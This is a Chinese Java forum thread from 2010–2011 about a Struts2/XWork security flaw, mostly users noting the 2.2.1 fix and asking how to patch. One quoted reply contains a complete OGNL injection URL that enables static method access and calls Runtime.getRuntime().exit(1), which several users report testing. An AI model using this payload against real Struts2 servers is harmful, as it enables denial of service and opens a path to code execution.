论坛首页 Java企业应用论坛

Struts2/XWork 安全漏洞及解决办法

浏览 68966 次
锁定老帖子 主题:Struts2/XWork 安全漏洞及解决办法
该帖已经被评为精华帖
作者 正文
  • mlw2000
  • 等级: 初级会员
  • 性别:
  • 文章: 139
  • 积分: 60
  • 来自: 深圳
   发表时间:2010-08-17  
struts-2.2.1已发布,修复了这个漏洞
返回顶楼
          回帖地址
1 请登录后投票
  • my_corner
  • 等级: 一星会员
  • 性别:
  • 文章: 151
  • 积分: 190
  • 来自: 北京
   发表时间:2010-08-27  
mlw2000 写道
struts-2.2.1已发布,修复了这个漏洞

呵呵,看到了已经Release了,不过还没有来得及实验。
返回顶楼
          回帖地址
0 请登录后投票
  • jackieban
  • 等级: 初级会员
  • 性别:
  • 文章: 4
  • 积分: 30
  • 来自: 上海
   发表时间:2010-09-02  
这。。。我看不太懂
返回顶楼
          回帖地址
0 请登录后投票
  • 邪恶八进制
  • 等级: 初级会员
  • 性别:
  • 文章: 2
  • 积分: 30
  • 来自: 北京
   发表时间:2010-11-29  
这个方法是否可行呢、 直接在struts-default.xml中修改它,再重新打包回去。
返回顶楼
          回帖地址
0 请登录后投票
  • gauzeehom
  • 等级: 初级会员
  • 性别:
  • 文章: 21
  • 积分: 0
  • 来自: QZ
   发表时间:2011-04-14  
害得我好紧张
返回顶楼
          回帖地址
0 请登录后投票
  • finallygo
  • 等级: 初级会员
  • 性别:
  • 文章: 393
  • 积分: 40
  • 来自: 厦门-->北京
   发表时间:2011-04-14   最后修改:2011-04-14
huaihenu 写道
xxdneu 写道
http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

没测试成功

struts 2.0.11
ognl 2.6

不知道是何原因


同样也是没有成功

struts 2.0.14
ognl 2.6.11

我和你用的版本一样,也没有测试成功
返回顶楼
          回帖地址
0 请登录后投票
  • java_user
  • 等级: 一星会员
  • 性别:
  • 文章: 376
  • 积分: 120
  • 来自: 深圳
   发表时间:2011-04-15  
那段参数要放在一个action后面。

我昨天赶紧升级了
返回顶楼
          回帖地址
0 请登录后投票
  • lf84730258
  • 等级: 初级会员
  • 性别:
  • 文章: 19
  • 积分: 30
  • 来自: 福州
   发表时间:2011-04-15  
同样没测试成功.我把参数跟在了?后面了.
返回顶楼
          回帖地址
0 请登录后投票
  • lyy3323
  • 等级: 初级会员
  • 性别:
  • 文章: 218
  • 积分: 30
  • 来自: 杭州
   发表时间:2011-04-29  
多谢楼主,不知道怎么改strurs2的jar包。
谁能给个步骤~~~~~
返回顶楼
          回帖地址
0 请登录后投票
论坛首页 Java企业应用版

跳转论坛:
Global site tag (gtag.js) - Google Analytics